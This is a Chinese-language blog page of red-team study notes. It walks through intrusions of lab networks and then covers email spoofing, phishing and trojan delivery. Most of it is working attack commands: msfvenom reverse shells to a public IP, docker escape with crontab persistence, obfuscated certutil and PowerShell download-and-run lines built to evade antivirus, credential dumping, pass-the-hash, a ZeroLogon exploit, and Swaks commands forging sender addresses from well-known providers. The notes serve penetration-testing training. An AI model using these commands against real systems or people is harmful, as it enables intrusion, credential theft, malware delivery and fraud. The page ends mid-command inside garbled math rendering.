



<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#FFF">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">

<link rel="icon" type="image/ico" sizes="32x32" href="/images/favicon.ico">
  <meta http-equiv="Cache-Control" content="no-transform">
  <meta http-equiv="Cache-Control" content="no-siteapp">


<link rel="alternate" type="application/rss+xml" title="X_T" href="http://n1h1l157.github.io/rss.xml" />
<link rel="alternate" type="application/atom+xml" title="X_T" href="http://n1h1l157.github.io/atom.xml" />
<link rel="alternate" type="application/json" title="X_T" href="http://n1h1l157.github.io/feed.json" />

<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Mulish:300,300italic,400,400italic,700,700italic%7CFredericka%20the%20Great:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20JP:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20SC:300,300italic,400,400italic,700,700italic%7CInconsolata:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="/css/app.css?v=0.2.5">

  

<link rel="canonical" href="http://n1h1l157.github.io/2023/07/04/SAFE/13%20%E8%A1%A5%E5%85%85%E7%9F%A5%E8%AF%86/">



  <title>
 |
Phut Hon = X_T = 天行健，君子以自强不息</title>
<meta name="generator" content="Hexo 6.3.0"></head>
<body itemscope itemtype="http://schema.org/WebPage">
  <div id="loading">
    <div class="cat">
      <div class="body"></div>
      <div class="head">
        <div class="face"></div>
      </div>
      <div class="foot">
        <div class="tummy-end"></div>
        <div class="bottom"></div>
        <div class="legs left"></div>
        <div class="legs right"></div>
      </div>
      <div class="paw">
        <div class="hands left"></div>
        <div class="hands right"></div>
      </div>
    </div>
  </div>
  <div id="container">
    <header id="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="inner">
        <div id="brand">
          <div class="pjax">
          
  <h1 itemprop="name headline">
  </h1>
  
<div class="meta">
  <span class="item" title="创建时间：2023-07-04 01:49:16">
    <span class="icon">
      <i class="ic i-calendar"></i>
    </span>
    <span class="text">发表于</span>
    <time itemprop="dateCreated datePublished" datetime="2023-07-04T01:49:16+08:00">2023-07-04</time>
  </span>
  <span class="item" title="本文字数">
    <span class="icon">
      <i class="ic i-pen"></i>
    </span>
    <span class="text">本文字数</span>
    <span>18k</span>
    <span class="text">字</span>
  </span>
  <span class="item" title="阅读时长">
    <span class="icon">
      <i class="ic i-clock"></i>
    </span>
    <span class="text">阅读时长</span>
    <span>30 分钟</span>
  </span>
</div>


          </div>
        </div>
        <nav id="nav">
  <div class="inner">
    <div class="toggle">
      <div class="lines" aria-label="切换导航栏">
        <span class="line"></span>
        <span class="line"></span>
        <span class="line"></span>
      </div>
    </div>
    <ul class="menu">
      <li class="item title"><a href="/" rel="start">Phut Hon</a></li>
    </ul>
    <ul class="right">
      <li class="item theme">
        <i class="ic i-sun"></i>
      </li>
      <li class="item search">
        <i class="ic i-search"></i>
      </li>
    </ul>
  </div>
</nav>

      </div>
      <div id="imgs" class="pjax">
        <ul>
          <li class="item" data-background-image="https://s2.loli.net/2023/04/01/dwNFSq4OhisgMJn.jpg"></li>
          <li class="item" data-background-image="https://s2.loli.net/2023/04/01/ixAYytdZ8HLRET2.jpg"></li>
          <li class="item" data-background-image="https://s2.loli.net/2023/04/01/LwdGZVHeWR3Kv6z.jpg"></li>
          <li class="item" data-background-image="https://s2.loli.net/2023/04/01/zqTVIhAkrmZgoSj.jpg"></li>
          <li class="item" data-background-image="https://s2.loli.net/2023/04/01/BYav6pSg8e1GqNH.jpg"></li>
          <li class="item" data-background-image="https://s2.loli.net/2023/04/01/QAxBIPapd1h6mvD.jpg"></li>
        </ul>
      </div>
    </header>
    <div id="waves">
      <svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto">
        <defs>
          <path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z" />
        </defs>
        <g class="parallax">
          <use xlink:href="#gentle-wave" x="48" y="0" />
          <use xlink:href="#gentle-wave" x="48" y="3" />
          <use xlink:href="#gentle-wave" x="48" y="5" />
          <use xlink:href="#gentle-wave" x="48" y="7" />
        </g>
      </svg>
    </div>
    <main>
      <div class="inner">
        <div id="main" class="pjax">
          
  <div class="article wrap">
    
<div class="breadcrumb" itemscope itemtype="https://schema.org/BreadcrumbList">
<i class="ic i-home"></i>
<span><a href="/">首页</a></span>
</div>

    <article itemscope itemtype="http://schema.org/Article" class="post block" lang="zh-CN">
  <link itemprop="mainEntityOfPage" href="http://n1h1l157.github.io/2023/07/04/SAFE/13%20%E8%A1%A5%E5%85%85%E7%9F%A5%E8%AF%86/">

  <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
    <meta itemprop="image" content="/images/avatar.jpg">
    <meta itemprop="name" content=".N1h1l157">
    <meta itemprop="description" content="天行健，君子以自强不息, 人生如逆旅，我亦是行人">
  </span>

  <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
    <meta itemprop="name" content="X_T">
  </span>

  <div class="body md" itemprop="articleBody">
    

    <h2 id="131-vpc项目"><a class="markdownIt-Anchor" href="#131-vpc项目">#</a> 13.1 vpc 项目</h2>
<h3 id="1311-vpc1"><a class="markdownIt-Anchor" href="#1311-vpc1">#</a> 13.1.1 vpc1</h3>
<p>通过 web 漏洞拿到 web 服务器的权限，用后门工具连接后，上传 cs 的马进<br>
行上线。<br>
对 web 服务器进行域内信息收集，端口扫描，mimikatz 运行，导出部分凭<br>
据和明文。设置代理转发端口，利用 proxychains 代理流量并用 CrackMapExec<br>
 工具进行域用户和本地用户的密码喷射，得到 windows 7 的本地用户权限，通<br>
过端口转发上线此台机器。win 7 的域用户 hash 和明文进行喷射时发现没有效果。<br>
在 windows 7 上进行 spn 扫描，识别到了 mssql 服务器，利用注册表命令对<br>
 navicat 进行密码的读取并利用工具解密得到 mssql 的数据库密码。在主机上通<br>
过 MDUT 与 proxifer 建立的规则连接到获取到密码的 mssql，开启 xpcmdshell 并<br>
上传木马至服务器，执行成功之后获取到了 windows 2008 的主机权限。<br>
对拿到的 2008 再次进行 mimikaz 导出明文，设置代理规则，用获取到的明<br>
文依次进行域用户和本地用户登录，最终得到域控权限。</p>
<h3 id="1312-vpc2"><a class="markdownIt-Anchor" href="#1312-vpc2">#</a> 13.1.2 vpc2</h3>
<p>（ 1 ）web 服务器 linux 权限获取<br>
 web 上的 url 地址显示 login;jsessionid，抓包可以得到 remember me 的字段，<br>
判断出是 shiro 框架，直接用 shiro 反序列化工具攻击，通过此工具植入哥斯拉<br>
的内存马，用哥斯拉上线此台机器。<br>
对此机器进行审查，查看到有 dockerenv 的文件，从而判断出当前正处于 d<br>
ocker 内，需要进行 docker 逃逸，采用 https://cloud.tencent.com/developer/article/<br>
1987725 中的挂载方法进行逃逸。<br>
fdisk -l &amp; mkdir xiaodi &amp; mount /dev/vda1 xiaodi/ &amp; chroot /xiaodi/<br>
 攻击 linux 常用 msf，准备 msf 的 elf 木马如下，生成之后将木马通过哥斯拉<br>
上传到 docker 容器中，在从 docker 容器挂载的目录复制到 /root 目录下。同时 m<br>
sf 开启监听，等待木马执行之后的回联。<br>
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=47.94.236.117 LPO<br>
RT=3333 -f elf &gt; shell.elf<br>
 修改计划任务设置木马执行的时间<br>
 chmod +x /xiaodi/root/shell.elf<br>
echo ‘*/1 * * * * root /root/shell.elf’ &gt;&gt; /xiaodi/etc/crontab<br>
 等待特定时间后成功上线 linux</p>
<p>（ 2 ）windows 2012 权限获取<br>
通过 msf 添加路由的方式自动添加路由，对 1 网段进行扫描，获取到存活<br>
主机 1 .16 与 1 .10，并且在 16 地址上存在 web 服务，通过 msf 设置代理规则将<br>
内网服务映射到服务器上，利用 proxychains 在外网上访问内网服务。构造 http:<br>
<a target="_blank" rel="noopener" href="//192.168.1.16/?num%5B%5D=1">//192.168.1.16/?num[]=1</a> 进行绕过，并且得到了主机凭据 {Administrator / Admin<br>
1234567}。<br>
批量对域用户和本地用户进行凭据测试，判断出此凭据属于 win 2012 的本<br>
地用户。<br>
proxychains python cme smb 192.168.1.10- 16 - u administrator -p ‘Admin12<br>
34567’ --local-auth<br>
win 2012 设置有防止流量出站的防火墙规则，采用正向连接的木马绕过此<br>
限制，若不知道网络情况的话需要反向正向都进行测试，命令如下。<br>
msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=127.0.0.1 LPORT=<br>
5555 - f exe &gt; bd.exe<br>
 因 win 2012 不出网，故将木马上传至 linux 跳板机，在跳板机上用 python 开<br>
启简易 web 服务，python -m SimpleHTTPServer。并利用 CrackMapExec 直接在<br>
 win 2012 上执行下载木马并且运行的木马，同时对特定端口进行正向监听，等<br>
待 shell 的回连。<br>
proxychains python cme smb 192.168.1.16 -u administrator -p ‘Admin1234<br>
567’ -x ‘cmd.exe /c certutil -urlcache -split -f <span class="exturl" data-url="aHR0cDovLzE5Mi4xNjguMS4xNDo4MDAwL2JkLmV4ZQ==">http://192.168.1.14:8000/bd.exe</span> c:/<br>
bd.exe &amp; c:/bd.exe’ --local-auth<br>
 此时成功获取到了 win 2012 的权限。</p>
<p>（ 3 ）dc 权限获取<br>
在 win 2012 进行 mimikatz kiwi 的攻击从而获取到登录过此主机的历史 has<br>
h，成功获取到一个 xiaodisec 用户的 hash 值。测试此 hash 值与 dc 的通信。<br>
proxychains python cme smb 192.168.1.10 -u administrator -H hash<br>
 发现此 hash 值就是 dc 的凭据，接下来就是利用此 hash 进行木马下载，上<br>
传木马至 dc，并突破火绒的限制，拿到 dc 的权限。<br>
通过 msf 生成 hex 的木马，撰写 go 脚本实现命令拼接式的无文件落地的免<br>
杀 exe。并通过同样的方法将命令放在 linux 上开启的简易 web 上。<br>
msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=127.0.0.1 LPORT=<br>
6666 - f hex</p>
<p>用 CrackMapExec 执行普通的命令执行时都会被视为威胁无法成功，通过如<br>
下的方式绕过火绒的检测，从 linux 上获取到木马并执行。<br>
“c”“e”“r”“t”“u”“t”“i”“l” -“u”“r”“l”“c”“a”“c”“h”“e” -split -f <span class="exturl" data-url="aHR0cDovLzE5Mi4xNjguMS4xNDo=">http://192.168.1.14:</span><br>
8000/5.exe c:/5.exe’<br>
下载仍然是失败的，在此情况下，使用交互式方案下载木马，具体命令如<br>
下。<br>
proxychains python <span class="exturl" data-url="aHR0cDovL3NtYmV4ZWMucHk=">smbexec.py</span> -hashes :f1065013e55bbbeb64ddab76822971<br>
0d xiaodi/administrator@192.168.1.10<br>
 以此方式打开的交互式 cmd，可以下载免杀木马并且执行成功上线。除了<br>
这种变异命令之外，还可以采用 copy 的方式，从域控上讲木马从 linux 上直接<br>
复制到其上，不过也是需要开启交互式的 cmd 进行木马的获取的。<br>
杀毒对外部的数据比较严格，对自己的数据比较宽松，可以生成票据从域<br>
控连接到域内主机，通过 copy 命令将 exe 木马从域内主机复制到域控上。</p>
<h3 id="1313-vpc3"><a class="markdownIt-Anchor" href="#1313-vpc3">#</a> 13.1.3 vpc3</h3>
<p>（ 1 ）靶场 1 - Web 攻防<br>
（ 2 ）靶机 2 - MS17010 漏洞<br>
密码喷射尝试：（失败）（由于知道是工作组，所以不需要进行域登录，参<br>
数也要改）<br>
proxychains python cme smb 192.168.2.128- 129 - u administrator -H 53bd9<br>
892cea6f1d9ffa8ac587ba3cba6 --local-auth<br>
MS17010-MSF 判断和利用<br>
 msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=47.94.236.117 LPO<br>
RT=999 -f exe &gt; m.exe</p>
<p>检测：auxiliary/scanner/smb/smb_ms17_010<br>
 利用：exploit/windows/smb/ms17_010_eternalblue<br>
（ 3 ）靶机 3 - 口令获取<br>
密码喷射尝试：（成功）<br>
直接 CS 插件移动获取成功<br>
（ 4 ）靶机 4 - 通过 weblogic 获取<br>
密码喷射尝试：（失败）<br>
探针端口 7001 开放 - Weblogic - 利用漏洞攻击 - 工具利用<br>
上传 webshell-C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base<br>
_domain\servers\AdminServer\tmp_WL_internal\bea_wls_internal\9j4dqk\war\xiaod<br>
i.jsp<br>
 上传后门（反向）- 防火墙开启（扫描的时候发现被阻止）<br>
执行后门上线 CS<br>
（ 5 ）靶机 5<br>
 利用靶机 4 的口令横向移动得到<br>
（ 6 ）靶机 6<br>
CVE- 2017 - 0146 不存在、CVE- 2014 - 6324 太老、CVE- 2021 - 42287 、CVE-<br>
2022 - 26923 条件不满足。CVE- 2020 - 1472 满足。<br>
连接 DC 清空凭证：<br>
proxychains python cve- 2020 - 1472 - <span class="exturl" data-url="aHR0cDovL2V4cGxvaXQucHk=">exploit.py</span> dc 192.168.10.10<br>
 获取域内 HASH:<br>
cd impacket-0.9.23/examples/<br>
proxychains python <span class="exturl" data-url="aHR0cDovL3NlY3JldHNkdW1wLnB5">secretsdump.py</span> <span class="exturl" data-url="bWFpbHRvOmRjJEAxOTIuMTY4LjEwLjEw">dc$@192.168.10.10</span> -just-dc -no-pass<br>
 连接域控 PTH：<br>
proxychains python <span class="exturl" data-url="aHR0cDovL3dtaWV4ZWMucHk=">wmiexec.py</span> -hashes :a402bea39d0f49b50ea1941120780e<br>
e3 xdorg/administrator@192.168.10.10<br>
 上传后门至域内主机上 &amp; CS 横向移动<br>
 copy \web\c$\6677.exe<br>
6677.exe<br>
connect 192.168.10.10 6677</p>
<h3 id="1314-vpc4"><a class="markdownIt-Anchor" href="#1314-vpc4">#</a> 13.1.4 vpc4</h3>
<h5 id="1-靶机-1-web"><a class="markdownIt-Anchor" href="#1-靶机-1-web">#</a> （ 1 ）靶机 1 ：WEB</h5>
<p>tomcat 弱口令上传制作的 war 连接哥斯拉、上传 cs 后门执行上线，getsyste<br>
m 进入域、探针内网 IP 段，定位域控，信息打点服务。<br>
提高权限：getsystem<br>
 获取前缀：net view /domain<br>
 定位域控：net time /domain<br>
netbios 前缀：jishu<br>
 域控：jishudc.jishu.xiaodi.vpc 192.168.2.20<br>
（ 2 ）靶机 2 ：SQL<br>
 口令喷射失败<br>
 spn 扫描服务<br>
数据库配置文件翻阅，弱口令爆破（MSSQL）<br>
MDUT 代理转发 正向上线 主动连接上线<br>
（ 3 ）靶机 3 ：jishudc<br>
psexec CrackMapExec 口令喷射成功，横向拿下<br>
（ 4 ）靶机 4 ：xds<br>
 利用域管口令横向拿下<br>
获取前缀：net view /domain<br>
 获取到其他子域 xiaoshou<br>
xiaoshou.xiaodi.vpc<br>
（ 5 ）靶机 5 ：xsd<br>
 口令喷射不成功，有防火墙<br>
 80 端口拿下 - 通达 OA 漏洞利用 - Getshell<br>
 上传正向木马执行并主动连击</p>
<p>获取域控 netbios 及域控 ip 地址<br>
（ 6 ）靶机 6 ：xiaoshoudc<br>
hash 匹配不上，采用漏洞提权， 14 、 17 年的漏洞太老不选择， 21 、 22 需要<br>
一个域内的明文账户密码，前提条件不满足，选择 20 年的漏洞。<br>
proxychains python cve- 2020 - 1472 - <span class="exturl" data-url="aHR0cDovL2V4cGxvaXQucHk=">exploit.py</span> xiaoshoudc 192.168.3.20<br>
shell noPac.exe -domain xiaoshou.xiaodi.vpc -user xiaosedi -pass xsd!@#45<br>
/dc xiaoshoudc.xiaoshou.xiaodi.vpc /mAccount test /mPassword 12qwAS… /servi<br>
ce cifs /ptt<br>
 利用 hash 及 psexec 进行利用拿权限：flag.txt 口令传递拿下、shell copy ha<br>
ck.php \xiaoshoudc\c\phpstudy_pro\www\hack.php
（ 7 ）靶场 7 ：file 也可以采用Nopac提权
横向口令拿下
proxychains python cme smb 192.168.4.11 -u administrator -H f1065013e5
5bbbeb64ddab768229710d --local-auth
（ 8 ）靶场 8 ：fileadmin
资源约束委派
获取受害目标：有哪些域内计算机存在同一用户加入的
shell AdFind.exe -h 192.168.4.20 -b "DC=xiaodi,DC=vpc" -f "objectClass=c
omputer" mS-DS-CreatorSID
判断受害用户：
shell sid2user.exe \\192.168.4.20 5 21 3673262946 1983004332 292552684
9 1103
shell SharpAllowedToAct.exe -m xxxyyxxx -p xxyyx!@#45 -t file -a 192.1
68.4.20 xiaodi.vpc
python getST.py -dc-ip 192.168.4.20 xdvpc/fileadmin:file!@#45 -spn cifs/fi<br>
leadmin.xiaoshou.xiaodi.vpc -impersonate administrator<br>
kerberos::ptc administrator.ccache<br>
（ 9 ）靶场 9 ：dc<br>
<span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL0tldmluLVJvYmVydHNvbi9JbnZlaWdo">https://github.com/Kevin-Robertson/Inveigh</span><br>
 监听拦截到 DC 的密文 ：Inveigh.exe<br>
 获取到的是 NET NTLM HASH V1 或 V2<br>
 破解得出明文：hashcat.exe -a 3 -m 5600 xxxxxx ?l?l?l?l?l?s?s?s?d?d?d?d<br>
 通过 Inveigh.exe 获取的明文横向移动获取</p>
<h2 id="132-红队apt"><a class="markdownIt-Anchor" href="#132-红队apt">#</a> 13.2 红队 APT</h2>
<h3 id="1321-邮件钓鱼"><a class="markdownIt-Anchor" href="#1321-邮件钓鱼">#</a> 13.2.1 邮件钓鱼</h3>
<p><strong>0 x01 SPF</strong> 相关知识</p>
<p>（ 1 ）什么是 SPF<br>
 发件人策略框架（Sender Policy Framework）电子邮件认证机制，中文译<br>
为发送方策略框架，主要作用是防止伪造邮件地址。<br>
（ 2 ）如何判断 SPF<br>
dig -t txt <span class="exturl" data-url="aHR0cDovL3FxLmNvbQ==">qq.com</span> //linux<br>
nslookup -type=txt <span class="exturl" data-url="aHR0cDovL3FxLmNvbQ==">qq.com</span> //windows<br>
（ 3 ）SPF 相关显示<br>
 “v=spf1 -all” （拒绝所有，表示这个域名不会发出邮件）<br>
“v=spf1 +all” （接受所有）<br>
“v=spf1 ip4:192.168.0.1/16 -all”（只允许 192.168.0.1/16 范围内的 IP 发送<br>
邮件）<br>
“v=spf1 mx -all”（允许当前域名的 mx 记录对应的 IP 地址发送邮件）<br>
“v=spf1 mx mx:test.example.com -all”（允许当前域名和 <span class="exturl" data-url="aHR0cDovL3Rlc3QuZXhhbXBsZS5jb20=">test.example.com</span><br>
 的 mx 记录对应的 IP 地址发送邮件）<br>
“v=spf1 a mx ip4:173.194.72.103 -all”（允许当前域名的 a 记录和 mx 记<br>
录和一个给定的 IP 地址发送邮件）<br>
“v=spf1 include:example.com -all”（采用和 <span class="exturl" data-url="aHR0cDovL2V4YW1wbGUuY29t">example.com</span> 一样的 SPF 记录）</p>
<p><strong>0 x0 2 Swaks</strong> 简单使用说明</p>
<ul>
<li>t –to 目标地址 - t <span class="exturl" data-url="bWFpbHRvOnRlc3RAdGVzdC5jb20=">test@test.com</span></li>
<li>f –from 来源地址 (发件人) -f “text<span class="exturl" data-url="bWFpbHRvOnRleHRAdGV4dC5jb20=">text@text.com</span>”</li>
<li>protocol 设定协议 (未测试)<br>
–body “<span class="exturl" data-url="aHR0cDovL3d3dy5iYWlkdS5jb20=">http://www.baidu.com</span>” // 引号中的内容即为邮件正文；<br>
–header “Subject:hello” // 邮件头信息，subject 为邮件标题</li>
<li>ehlo 伪造邮件 ehlo 头<br>
–data ./Desktop/email.txt// 将 TXT 文件作为邮件发送；</li>
</ul>
<p><strong>0x0 3 gophish</strong> 安装使用</p>
<p>工具地址：<span class="exturl" data-url="aHR0cHM6Ly9kb2NzLmdldGdvcGhpc2guY29tLw==">https://docs.getgophish.com/</span></p>
<p>项目地址：<span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL2dvcGhpc2gvZ29waGlzaA==">https://github.com/gophish/gophish</span><br>
（ 1 ）无 SPF 直接伪造 - Swaks<br>
 临时邮箱: <span class="exturl" data-url="aHR0cDovLzI0bWFpbC5jaGFjdW8ubmV0Lw==">http://24mail.chacuo.net/</span> <span class="exturl" data-url="aHR0cHM6Ly93d3cubGluc2hpLWVtYWlsLmNvbS8=">https://www.linshi-email.com/</span><br>
 检测: nslookup -type=txt <span class="exturl" data-url="aHR0cDovL3h4eC5jb20=">xxx.com</span><br>
 伪造：swaks --header-X-Mailer “” --header-Message-Id “” --header-&quot;Content</p>
<ul>
<li>Type&quot;=“text/html” --from “QQ 管理<span class="exturl" data-url="bWFpbHRvOmFkbWluQHFxLmNvbQ=="> admin@qq.com</span>” --ehlo shabimeiguo -head<br>
er “Subject: 测试” --body 我们做了一个测试 --to <span class="exturl" data-url="bWFpbHRvOm93YXptb2ZmdGhAaXVicmlkZ2UuY29t">owazmoffth@iubridge.com</span><br>
（ 2 ）有 SPF 直接伪造 - Swaks<br>
 工具地址：<span class="exturl" data-url="aHR0cDovL2pldG1vcmUub3JnL2pvaG4vY29kZS9zd2Frcy8=">http://jetmore.org/john/code/swaks/</span><br>
 软刚发信人：（修改字眼）swaks --body “test” --header “Subject:testT” -t x<br>
<span class="exturl" data-url="bWFpbHRvOnhAMTYzLmNvbQ==">x@163.com</span> -f <span class="exturl" data-url="bWFpbHRvOnN5c3RlbUBub3RpY2UuYWxpeXVuLmNvbS5jbg==">system@notice.aliyun.com.cn</span><br>
 硬刚发信人：（转发突破）注册一个邮箱开启 POP3 转发、使用网上已知的<br>
邮箱系统。将要发送的邮件导出 EML 模版，修改内置的发件人内容时间等。<br>
swaks --to 收信人 - f 发信人 --data 1.eml --server <span class="exturl" data-url="aHR0cDovL3NtdHAuMTYzLmNvbQ==">smtp.163.com</span> -p 25 -au<br>
 帐号 - ap 授权码<br>
自建要伪造高仿的邮箱系统、使用第三方平台或自行搭建、设置 SPF，中<br>
转平台突破。<br>
smtp2go（速度慢但免费发送量大）：<span class="exturl" data-url="aHR0cHM6Ly93d3cuc210cDJnby5jb20v">https://www.smtp2go.com/</span><br>
SendCloud（速度快但免费发送量少）：<span class="exturl" data-url="aHR0cHM6Ly93d3cuc2VuZGNsb3VkLm5ldC8=">https://www.sendcloud.net/</span><br>
 也可以自己搭建邮件服务器 - Ewomail&amp;Postfix：<span class="exturl" data-url="aHR0cDovL3d3dy5ld29tYWlsLmNvbS8=">http://www.ewomail.com/</span><br>
（ 3 ）采用自己搭建 Ewomail 配合 Swaks<br>
 转发地址域名由你指定注册、不受限于其他系统的限制和风控<br>
<span class="exturl" data-url="aHR0cDovL2RvYy5ld29tYWlsLmNvbS9kb2NzL2V3b21haWwvamlhbmppZQ=="> http://doc.ewomail.com/docs/ewomail/jianjie</span><br>
<span class="exturl" data-url="aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3UwMTI4NjY1MzIvYXJ0aWNsZS9kZXRhaWxzLzEyMzMzNTUyOQ==">https://blog.csdn.net/u012866532/article/details/123335529</span><br>
swaks --to <span class="exturl" data-url="bWFpbHRvOjQ3MTY1NjgxNEBxcS5jb20=">471656814@qq.com</span> -f <span class="exturl" data-url="bWFpbHRvOmFkbWluQGExaXl1bi5jb20=">admin@a1iyun.com</span> --data test.eml --serv<br>
er <span class="exturl" data-url="aHR0cDovL3NtdHAuYTFpeXVuLmNvbQ==">smtp.a1iyun.com</span> -p 25 -au <span class="exturl" data-url="bWFpbHRvOmFkbWluQGExaXl1bi5jb20=">admin@a1iyun.com</span> -ap xiaodi123</li>
</ul>
<p><strong>0x0 4</strong> 网页钓鱼</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">克隆：手工另存为、Setoolkit、Goblin</span><br><span class="line">工具地址：https://github.com/xiecat/goblin</span><br><span class="line">项目地址：https://github.com/trustedsec/social-engineer-toolkit</span><br></pre></td></tr></table></figure>
<h3 id="1322-宏病毒-lnk木马"><a class="markdownIt-Anchor" href="#1322-宏病毒-lnk木马">#</a> 13.2.2 宏病毒 LNK 木马</h3>
<p><strong>0 x01</strong> 宏病毒</p>
<p>生成宏病毒：Attacks --&gt; Packages --&gt; MS offices Macro<br>
 操作：Office 格式文档文件钓鱼一般采用宏或对象触发后门；默认 Office 加<br>
载宏后一般需要启用内容才可调用执行；所以诱惑伪装很重要。<br>
伪装：提示需要启用内容才能查看文件内容，并设置限制编辑等<br>
文件内容模式：docx-doc&amp;docm、xlsx-xls&amp;xlsm、pptx-ppt&amp;pptm<br>
 老版本： 97 - 2003 0ffice 默认是支持宏代码运行<br>
新版本：启动宏的格式，一般就是在后缀加上 M</p>
<p><strong>0 x0 2 CHM</strong> 电子书</p>
<p>CS 生成上线：Attacks——&gt;Web Drive by——&gt;Scripted web Delivery<br>
CHM 伪装：找一个正常的 CHM 电子书，解压后；将 Payload 插入其中某<br>
个或整个页面；加载编译，当电子书打开修改页面后上线。<br>
解压命令：hh -decompile .\html xx.CHM<br>
 木马执行：使用 bitsadmin 或 Powershell 模式加载木马<br>
免杀方案：<br>
powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloa<br>
dstring(‘<span class="exturl" data-url="aHR0cDovLzQ3Ljk0LjIzNi4xMTc6ODQvYQ==">http://47.94.236.117:84/a</span>’))”<br>
bitsadmin /transfer 604c <span class="exturl" data-url="aHR0cDovLzQ3Ljk0LjIzNi4xMTc6ODMvYQ==">http://47.94.236.117:83/a</span> %APPDATA%\604c.exe&amp;%<br>
APPDATA%\604c.exe&amp;del %APPDATA%\604c.exe<br>
“c”“e”“r”“t”“u”“t”“i”“l” -“u”“r”“l”“c”“a”“c”“h”“e” -split -f <span class="exturl" data-url="aHR0cDovLzQ3Ljk0LjIzNi4xMTc=">http://47.94.236.117</span><br>
/5.exe c:/5.exe &amp; c:/5.exe<br>
powershell -NoExit “<span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>c</mi><mn>1</mn><msup><mo>=</mo><mo mathvariant="normal" lspace="0em" rspace="0em">′</mo></msup><mi>I</mi><mi>E</mi><mi>X</mi><mo stretchy="false">(</mo><mi>N</mi><mi>e</mi><mi>w</mi><mo>−</mo><mi>O</mi><mi>b</mi><mi>j</mi><mi>e</mi><mi>c</mi><mi>t</mi><mi>N</mi><mi>e</mi><mi>t</mi><mi mathvariant="normal">.</mi><mi>W</mi><mi>e</mi><mi>b</mi><mi>C</mi><mi>l</mi><mi>i</mi><mi>e</mi><mi>n</mi><mi>t</mi><mo stretchy="false">)</mo><mi mathvariant="normal">.</mi><mi>D</mi><mi>o</mi><mi>w</mi><mi>n</mi><mi>l</mi><msup><mi>o</mi><mo mathvariant="normal" lspace="0em" rspace="0em">′</mo></msup><mo separator="true">;</mo></mrow><annotation encoding="application/x-tex">c1=&#x27;IEX(New-Object Net.WebClient).Downlo&#x27;;</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.751892em;vertical-align:0em;"></span><span class="mord mathnormal">c</span><span class="mord">1</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span><span class="mrel"><span class="mrel">=</span><span class="msupsub"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.751892em;"><span style="top:-3.063em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mtight">′</span></span></span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2777777777777778em;"></span></span><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em;"></span><span class="mord mathnormal" style="margin-right:0.07847em;">I</span><span class="mord mathnormal" style="margin-right:0.05764em;">E</span><span class="mord mathnormal" style="margin-right:0.07847em;">X</span><span class="mopen">(</span><span class="mord mathnormal" style="margin-right:0.10903em;">N</span><span class="mord mathnormal">e</span><span class="mord mathnormal" style="margin-right:0.02691em;">w</span><span class="mspace" style="margin-right:0.2222222222222222em;"></span><span class="mbin">−</span><span class="mspace" style="margin-right:0.2222222222222222em;"></span></span><span class="base"><span class="strut" style="height:1.001892em;vertical-align:-0.25em;"></span><span class="mord mathnormal" style="margin-right:0.02778em;">O</span><span class="mord mathnormal">b</span><span class="mord mathnormal" style="margin-right:0.05724em;">j</span><span class="mord mathnormal">e</span><span class="mord mathnormal">c</span><span class="mord mathnormal">t</span><span class="mord mathnormal" style="margin-right:0.10903em;">N</span><span class="mord mathnormal">e</span><span class="mord mathnormal">t</span><span class="mord">.</span><span class="mord mathnormal" style="margin-right:0.13889em;">W</span><span class="mord mathnormal">e</span><span class="mord mathnormal">b</span><span class="mord mathnormal" style="margin-right:0.07153em;">C</span><span class="mord mathnormal" style="margin-right:0.01968em;">l</span><span class="mord mathnormal">i</span><span class="mord mathnormal">e</span><span class="mord mathnormal">n</span><span class="mord mathnormal">t</span><span class="mclose">)</span><span class="mord">.</span><span class="mord mathnormal" style="margin-right:0.02778em;">D</span><span class="mord mathnormal">o</span><span class="mord mathnormal" style="margin-right:0.02691em;">w</span><span class="mord mathnormal">n</span><span class="mord mathnormal" style="margin-right:0.01968em;">l</span><span class="mord"><span class="mord mathnormal">o</span><span class="msupsub"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.751892em;"><span style="top:-3.063em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mtight">′</span></span></span></span></span></span></span></span></span><span class="mpunct">;</span></span></span></span>c2=‘123<br>
